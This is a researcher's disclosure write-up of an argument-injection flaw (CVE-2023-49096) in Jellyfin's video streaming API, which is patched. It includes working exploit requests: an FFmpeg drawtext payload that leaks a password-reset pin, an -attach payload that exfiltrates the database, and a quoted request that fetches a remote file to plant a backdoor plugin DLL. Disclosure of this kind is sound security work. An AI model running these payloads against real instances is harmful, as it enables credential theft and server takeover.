Get Out of Jelly Free Card
Roses are chrominance blue,
Water is chrominance red,
I suggest you,
Dive into FFmpeg.
– Fred Murpheg, https://youtu.be/9kaIXkImCAM
Last time we managed to gain remote code execution on a default Jellyfin
instance. Unfortunately we needed a low-privileged user account to make it happen.
After seeing how many instances of Jellyfin
are directly reachable, I went back to the drawing board. Because what’s better than a post-authentication vulnerability?
Exactly: A pre-authentication vulnerability!
In this article, we’re going to have a more thorough look at the REST API
, discover an argument injection (CVE-2023-49096) and finally exploit it in order to read arbitrary files among other things.
But first, we need a big…
Disclaimer
Don’t panic!
While the issue is technically exploitable by an unauthenticated attacker, the reality is a lot more nuanced. You see, we need to know the id of any item in the database. Those ids are random GUIDs
, which makes exploitation without an additional information leak highly unlikely, if not impossible!
It certainly becomes a more pressing issue when taking low-privileged users into consideration, but as it stands you’re probably fine.
This vulnerability plus an additional one are fixed in version 10.8.13.
Go to Definition
Jellyfin
is a big project with a big surface. But reading through the collection of potential security issues again, I decided to give the REST API
another look.
Just like before, we can search for the [Authorize]
attribute of every endpoint. Only this time we want it to be absent.
The aforementioned GitHub
issue mentions the VideosController.cs
endpoints, specifically /Videos/<itemId>/stream
and /Videos/<itemId>/stream.<container>
.
They are responsible for streaming videos, which might involve an encoding step (depending on which format the client requested). This optional step makes them especially interesting: Who knows what can be done if attacker controlled values land in an FFmpeg
invocation? 1
Both endpoints caught my attention because of the sheer number of arguments that can (optionally) be passed to them:
|
|
51 parameters! Now that’s a lot. The highlighted ones will become relevant in a second.
It certainly looks like a good target, so let’s start to manually trace every input. In order to not get overwhelmed, we focus on strings
first. Chances are they get incorporated as-is.
Let’s do this!
Okay I’m kidding, it wasn’t that bad!
The videoCodec
parameter caught my attention pretty quickly.
It looks like we can provide a number of different codecs separated by commas, but the first one will be selected no matter what 🤷🏻.
Maybe down the line SupportedVideoCodecs
are used again?
|
|
We ultimately end up in the EncodingHelper
class, where the command line arguments for FFmepg
are constructed.
|
|
Some more processing of our input is done in line five. We’ll get to line 15 soon.
|
|
The OutputVideoCodec
property in line four is our controlled value.2
We see a bunch of ifs
, but no else
with a default value. That’s super exciting! In essence, our string gets returned untouched in line 19. Well, there is some processing in the form of .ToLowerInvariant()
. But because we only provide lowercase input anyway, we don’t care.
Next, our input is finally added to the command line string in GetProgressiveVideoArguments()
:
|
|
After all that tracing, we found a sink inside the FFmpeg
command line for attacker controlled values. Cool.
What exactly does that mean, though?
Diving into FFmpeg
My first thought was executing arbitrary commands via command substitution. However, there’s a clear distinction between the ability to inject commands or arguments.
Because we can only work with the intended functionality, the latter is highly application dependent3. The former, while potentially allowing for more generic attacks, needs the presence of a shell that parses the invocation.
Sadly, no shell will ever parse our malicious input!
Why? Here’s the invocation of FFmpeg
:
|
|
By setting UseShellExecute
to false
in line eight, the .NET
runtime effectively forks and executes a process and directly passes those arguments as argv
to the program.
Looking at the implementation, I’m not too sure that setting UseShellExecute
to true
would help us either. In both cases, ForkAndExecProcess()
is called with our arguments.
But that’s only the Unix
implementation. On Windows
, there’s actually a distinction between using CreateProcess
and ShellExecute
under the hood.
In any case, the result is the same: We cannot inject arbitrary commands, but have to make do with the functionality FFmpeg
provides.
But don’t fret! There are worse places to be stuck in than the FFmpeg
command line.
It might as well be Turing-complete.
Thinking about how to exploit this, I realized two things:
FFmpeg
has a lot of functionality. It’s actually amazing.- There’s a reason why most people use a wrapper around it.
The attacks I was able to come up with are simple enough. However, it took me embarrassingly long to construct them. The sheer number of switches and arguments is nightmare fuel!
Exploitation
I’ve stopped after identifying three exploitation vectors:
- Overwriting arbitrary files with a zero byte file by specifying an additional output.
- Overlaying any text file onto the final video via the drawtext filter.
- Including any file as an attachment to the final video.
Because I didn’t want to go down too many rabbit holes, I’ve opted to only use Jellythings again.
Overwriting
Zeroing-out a file sounds useful. I’ve tried overwriting the main settings file (system.xml
) in the hopes Jellyfin
would create a default one. The setting I was looking for is IsStartupWizardComplete
, which defaults to false. This in turn would give us far-reaching access to the instance.
Sadly, that’s not how it works. Jellyfin
simply checks for the presence of that file. A zeroed-out file is still present, so the whole thing turns into a denial-of-service (DoS
) attack, because the instance cannot start correctly any longer.
I’ve tried the same thing with the main database file, jellyfin.db
. Here, a new SQLite
database is actually created, which we can thank Entity Framework Core for. At least I think that’s what’s happening.
The new database won’t have any users stored, so nobody is able to log in. Another DoS, which is not what we’re looking for.
While there might be viable attacks if we’d extend the scope to the whole system, I’m sticking to Jellyfin
components only. Please let me know if you can think of another vector.
Drawtext
FFmpeg
has extensive filtering capabilities. One of those is the drawtext filter. It allows us to draw text from a file on top of a video.
Trying to specify one such filter in our videoCodec
argument results in a warning. That’s because Jellyfin
defines its own filters and FFmpeg
says no, no, no.
Only the last filter will be applied.
But that’s not a problem at all! There’s another attacker controlled value: The audioCodec
. This one gets inserted after their hardcoded filter.
As a result, FFmpeg
uses our filter. Perfect!
What file do we want to overlay?
Jellyfin
allows users to reset their password. The accounts are not connected to mail addresses, so it works by simply providing a valid username. This internally sets an easy-access pin for the user, which gets stored server-side in a file and inside the database.
Oh, we’re also kindly provided with the full path to the file. 🙏
There is a caveat, though: Initiating the reset process can only be done from within the same network as the instance. I don’t know how reverse proxies could undermine that assumption. As far as I can tell, the code doesn’t check the Forwarded header.
If that’s really the case, than Jellyfin
might only check the IP address of the reverse proxy (which sits on the same network) and therefore allow the password reset. However, it seems highly unlikely that the team missed something like this. On the other hand, Emby
had quite the situation in that part of the codebase, so you never know.
Anyway, here’s the (decoded) request used on Windows
that gets hold of the file:
http://localhost:8096/Videos/1011b7d34f0fa0b8cea35427e8b27f39/stream.mkv?audioCodec=copy -vf "drawtext=fontfile=/Windows/Fonts/Arial.ttf:textfile=/path/to/password_reset_file:fontsize=24:x=20:y=20:fontcolor=white"
And here’s a screenshot of the resulting video:
That’s such a stupid way of exfiltrating data. I love it!
Attachment
The other route are attachments. What are those? The FFmpeg
documentation says the following:
Add an attachment to the output file. This is supported by a few formats like Matroska for e.g. fonts used in rendering subtitles […]
Sounds powerful. What file do we want to attach? How about the SQLite
database, jellyfin.db
? While the passwords are hashed, API keys and easy access codes are not.
API keys have the same capabilities as an admin in practice, so those are a great find. If none are present, we can search for an admin and start the password reset process for their account.
This makes the previous attack obsolete. By resetting the password, not only does a temporary pin get written to a file, but also to the database. Afterwards we’d be able to retrieve it from the database itself.
Here’s the (decoded) request:
http://localhost:8096/Videos/1011b7d34f0fa0b8cea35427e8b27f39/stream.mkv?videoCodec=libx264 -attach </path/to/jellyfin.db> -metadata:s:2 mimetype=application/octet-stream
We specifically request the mkv
container in the URL
so that FFmpeg
doesn’t complain about the attachment.
Limitations
We need to keep a couple of limitations in mind.
First off, there’s a fast path for videos that have been encoded previously. If the requested video falls into that category, we need to wait until one of the build-in tasks cleans up the cache directory. This behavior is mainly tied to the final output path.
Furthermore, encoding could take a long time for a large video. We might run into the default keep alive timeout (130 seconds). Because the encoding will still finish in the background, this should be a non-issue. We can simply request the same file later, which will contain our attachment.
Untapped Potential
I’m actually extra positive that more powerful attacks could performed with our primitive.
There is probably a way of overwriting an arbitrary file with malicious content. FFmpeg
can retrieve output via numerous protocols, after all. Maybe those protocols can even be used to gather NTLM
hashes. That’s only speculation, though!
Full Potential
Most of this article was already done, as my first report of the issue was way back in June. It turns out another person, Martin Wagner, found the issue independently. My first bug collision, how exciting 🤩.
I was right in the previous paragraph! More powerful attacks were possible. Unlike myself, he actually managed to get remote code execution by dumping the attachment of a remote file:
/Videos/{media}/stream.mkv?VideoCodec=libx264 /tmp/a.mkv -dump_attachment:t /config/plugins/configurations/Jellyfin.Plugin.Backdoor.dll -i https://mawalabs.de/stuff/backdoor.mkv
The malicious DLL
gets placed in the plugin folder, where Jellyfin
auto-discovers and loads it after the next restart of the instance.
That’s such an ingenious idea, kudos to Martin.
The Fix
They use an attribute to validate the videoCodec
, audioCodec
, subtitleCodec
and segmentContainer
parameters with the help of a regular expression:
// EncondingHelper.cs
public const string ValidationRegex = @"^[a-zA-Z0-9\-\._,|]{0,40}$"
// VideosController.cs
[FromQuery][RegularExpression(EncodingHelper.ValidationRegex)] string? videoCodec,
What does the regex do? Well, ChatGPT, explain it like Lil Pump would:
Ayy, listen up, lil regex vibe,
Starts strong, gotta be real sly.
Letters, nums, dashes, dots in the mix,
Comma, pipe, underscore, don’t need a fix.
Zero to forty, that’s the game,
Gotta fit the pattern, ain’t that lame?
From start to end, it’s gotta flow,
Regex magic, make it go, “Whoa!"
Conclusion
I said it before: Dealing with user input is really hard. One slip-up can have a huge impact. The input can surface in unexpected places and is often hard to mentally track.
By now most developers are sensitized to SQL injection
, but the presented vulnerability shows that even something as restricted as the ability the add arguments to a program’s command line can lead to remote code execution under the right circumstances. Because attackers will get creative.
Well, what can we do? Where applicable, strings
should be avoided in favor of more constrained types like enums. Furthermore, many companies offer static analysis tools, which should be able to detect those kind of issues before they land in a release build.
On a more fundamental level, we should ask ourselves: Does our API really need to accommodate every client’s needs? Maybe it’s okay to sometimes shift the flexibility from the server back to the clients.
As always, thank you so much for reading!